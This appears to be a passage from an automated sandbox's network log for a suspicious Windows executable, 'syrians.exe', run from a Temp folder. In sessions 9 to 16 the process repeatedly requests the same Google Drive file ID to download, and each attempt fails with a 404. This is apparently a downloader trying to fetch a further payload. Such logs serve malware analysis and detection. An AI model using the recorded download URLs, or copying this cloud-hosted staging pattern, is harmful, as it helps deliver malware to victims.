2025-01-11 04:09:59 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:00 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:00 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Cgju3nQmnpy8EEPEcpwZFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	54053	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:00 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:01 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQDAP25Lf_bogmXBB_rV1jYVE-f7h5U_0yfeF5q6fLJaxXhnGVLnbP1Y2H0SbPO6Va-eM1U_ZU Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:01 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-7QFrbQ4V0xtVOs2Vx3NtkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:01 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 33 67 36 5f 76 31 33 38 38 79 38 62 59 67 44 58 6b 51 38 67 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n3g6_v1388y8bYgDXkQ8gw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	54054	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:02 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:02 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:02 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-bGaHJT0bV0UseGYDtZsAaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	54055	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:03 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:03 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQ8dnqcek4xtD0CIrfRIg9IlgVWdGMv4l8evxzkdvVE2oCphKzNkHoJKYxZd2P_Qcss Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:03 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-XFvFRvD552__qvyMaeXTEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:03 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 76 53 79 6d 6e 72 50 75 50 31 32 6a 39 2d 34 6b 57 54 36 76 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4vSymnrPuP12j9-4kWT6vQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	54056	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:04 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:04 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:04 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-NYJeDXCogDCphZ9PnEstgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	54057	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:05 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:05 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSdAj-_QBtwyXji2uEb4VFq5UfLly1N2ysFF0lSkdlbunL-MaV2cKgirwBn-b2rGnt3 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:05 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-A8swVLc9BQmMYDnogRkxwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:05 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 72 69 45 5a 69 61 39 75 34 30 68 4a 33 74 67 56 4b 71 6c 76 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lriEZia9u40hJ3tgVKqlvQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	54059	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:06 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:07 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:06 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-ZDJnjM-A9YE2hNXisD5lMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	54060	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:07 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:08 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgT9fLoagdcZuuAS6PbibJVSn4W2sffGV5yU2J0lKcgVKf_AdsxPfcHiUEyeild1mCFEpEvB4mU Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:08 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-lNlf0ztMUQY7_-1c3AfebQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:08 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 68 52 64 35 5f 52 41 4a 43 68 6a 6e 77 6b 6e 37 51 46 69 4a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-hRd5_RAJChjnwkn7QFiJQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	54061	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:08 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
